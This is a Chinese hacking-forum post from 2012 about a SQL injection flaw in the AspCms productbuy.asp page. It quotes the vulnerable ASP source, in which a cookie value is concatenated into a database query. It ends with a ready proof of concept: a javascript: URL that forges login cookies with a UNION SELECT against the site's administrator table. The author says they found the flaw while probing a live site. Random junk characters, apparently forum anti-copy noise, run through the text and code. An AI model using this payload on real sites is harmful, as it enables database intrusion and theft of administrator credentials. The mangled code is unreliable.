好久没上土司了,上来一看发现在删号名单内.....1 B* S7 M) D& L) k6 [0 v2 y
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。" {! C: V; j3 h F1 U) M0 M$ L
废话不多说,看代码:0 f- @- r/ J7 l7 m# D' F+ l
. L3 i6 e; X4 d" ]6 h<%3 q; W" J ^+ u( ^
T$ ~6 ]+ k2 J% ?: i+ k0 M2 fif action = "buy" then' w0 d7 \; O- |; g6 S( u1 o
! n9 e. X( u5 C addOrder()# M$ D( K8 ]- k4 g2 g+ _4 V! z+ z
# } b1 M4 P; Z1 Y5 I9 |* Q+ S
else: _' j) S& f* J
+ S2 F. a( [) L
echoContent()
4 Q* A$ S5 {- Y: J- j) @' d( q$ o5 I' M; ^7 T+ @+ x' K) C! d, ^
end if, k1 t" p( p$ b1 z2 D3 [3 _* n
# s* X6 M [6 N% S6 U2 b. U
) s4 I8 Z; M. ~, L: U
9 N. {: f; D) F- Y6 e% T0 K" n……略过
/ p5 b }3 @6 V" o( x0 X
5 H! }& `% Z; {' d
1 a% E6 E( ~0 e( I9 j' _# L
/ O, s C& f6 i/ `) ^$ C1 Y1 kSub echoContent(); a: O. F9 H) `* G
( Q2 K4 P& w5 M: b! {& D dim id
1 `2 J/ w; o% u) _2 A! o2 ^6 p8 F# {& h# Q$ |
id=getForm("id","get")
# c# P3 Q+ o4 L% z" W6 C& n# B
1 m% c% e ~$ d4 F' e' v
- R9 n. P& N. U& v' T# c2 A
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 5 }3 G8 z: {" U6 |! w
" N2 Y! L2 ~: l( p0 R( l% T+ T
9 o2 C5 x2 j. K! u; m4 p) _% @; \, Q8 \# V, V6 x* H: i
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template") O& t) j! K5 a) G! Y2 B; d% B4 J
) A( I% }& G9 Z1 G/ g
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
& }: |: n0 a5 r
4 Q \+ b+ ? C; q Dim templatePath,tempStr
7 q' F! d; o$ V' g0 J4 m- `' Z8 P* d" T, s" }5 \8 b. I! @
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
a5 T5 {3 @' f$ ?6 {, X# A; [, d" P% l0 l' M; V0 k( p0 C2 G! T
* R, G& o3 x0 k0 ?& F4 i I% C j" G$ `7 y$ ]" c1 U9 \6 Q1 D
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
! [+ q2 E0 E' m. ^+ O6 T" l2 Z) j; Q T, A8 m, \2 W
selectproduct=rsObj(0)
% |4 F: F6 s9 m& ]: r+ J& O) T7 b+ ?3 }+ v2 \
9 x6 E$ \ |- I. s- n
& N3 Q( x, c4 n8 I$ O/ U
Dim linkman,gender,phone,mobile,email,qq,address,postcode/ K7 y' ? [ P& z$ I' |
$ N* g7 \- k' G$ J6 g8 H) ]6 D5 x! V
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0) p, q' Z" g8 J( H
# N* G3 b0 u- T if rCookie("loginstatus")=1 then
* u! q' v( y0 I9 a1 x$ E$ n% c; z5 T, L. C. b8 a
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
" }* `' D- x- _/ {7 h% d1 m+ d a$ G# x. Z2 P
linkman=rsObj("truename")
. U9 B4 H2 j! a$ B+ i4 ~4 E
( H9 ^6 U) P9 J* L% L$ ? gender=rsObj("gender")0 n9 w% K: t6 I7 w6 k
' a+ M1 D2 u1 t# n
phone=rsObj("phone")! v7 [2 B6 P( l8 L
- F# O7 B0 e* n& c mobile=rsObj("mobile")
$ a8 [8 n. E6 @; n
1 N$ g: k! _+ x email=rsObj("email")
2 \: {: f- A- X2 s4 H4 H/ u/ {: W- v8 E1 ]& j, a
qq=rsObj("qq")
/ O+ q/ Z1 k2 U5 s
: h7 j* T8 D+ m H5 R# X address=rsObj("address")6 |) N5 y- G' a8 o$ N+ c6 E
& d. `. z8 B/ D, e' Z
postcode=rsObj("postcode") t8 R1 C0 u0 G# v( _% p) \
: j- x, z) N+ i, H/ N$ B
else ; T9 `# M; Y4 F+ }- u& L% V& A0 ?" U
1 T+ P, ]% e" y4 g/ z) u gender=1 }2 D, m, h( X) i- O
! D5 Y& x& N3 N
end if7 ^' k- w! N4 z, V: t% s2 J1 q
3 Z( M# ^# b8 m$ V& [, w1 l rsObj.close()
% F' ]' Q; B$ Z- q: W O% e, I$ m8 X2 J' d2 ? m7 v5 z2 z# \
: x8 V' H4 v$ h3 {2 i7 Y
4 G2 {- Y+ r3 E* I- E with templateObj 9 S1 n# v. X2 t( n9 h ?
( E/ z# p4 q7 O& M1 P% D' b( t( l |
.content=loadFile(templatePath) ; i+ [# R# i# M7 B
\& s, y7 H! h. [, `
.parseHtml()5 U7 h, C$ q$ D3 U( D
4 n, k7 V9 o0 S .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)" X, f+ B+ d, x* ?& J
2 [' w9 q! R+ s& B$ W
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
4 n1 v7 m7 ~. @% H2 G* \9 M Y; v* \; i
.content=replaceStr(.content,"[aspcms:gender]",gender) ) U; D3 ^# i% ]( ]9 m8 B3 Z+ R5 u. W
7 F T0 x$ D) W ? .content=replaceStr(.content,"[aspcms:phone]",phone) - {5 G# j& s! P: {' `) W* x/ t' B: @
8 b* A, N8 v Z: Z. s. U! n
.content=replaceStr(.content,"[aspcms:mobile]",mobile) 4 \7 x/ q. `% K9 C
" p& b0 N0 b0 L @% n) k! V4 T .content=replaceStr(.content,"[aspcms:email]",email) 6 N. w5 i7 N9 w: b T! O
0 Q7 z& Z7 f/ r" L3 _9 X* ] .content=replaceStr(.content,"[aspcms:qq]",qq)
; d3 K7 B2 t7 z* [+ V1 t" I8 Y
* H* j: d8 ^ f5 y% L( U3 P; i .content=replaceStr(.content,"[aspcms:address]",address)
) B6 d+ M# g f. _, z
* \0 Z% w: D- _/ t/ z .content=replaceStr(.content,"[aspcms:postcode]",postcode)
w8 L6 w2 ]3 r
+ w! H' _% [7 k .parseCommon()
& H( A/ t0 Z& |& n6 K# m$ l3 H( ]2 X) h4 }/ u
echo .content {6 w& P4 F q" V6 P( Y
; Q# @, B5 D) s2 X: x$ T: {* U7 u
end with* W# \& z5 I2 W
0 j, G t; ?1 U7 |. b- }) P" R set templateobj =nothing : terminateAllObjects7 l7 Y. R2 @% U8 O
; P3 T" K$ d0 y# [ [
End Sub
& z, j# t9 y# N漏洞很明显,没啥好说的
- Y$ n' S, @5 R4 Gpoc:) U+ H0 z4 r+ i5 e
/ A; j; p* U! ~javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
' i. | Y8 r* ~- ^$ Y6 x7 J4 ]
1 ~3 P# E' b% n9 q8 i6 y' J# L: g |
发表于 2012-12-27 08:35:05
收藏
支持
反对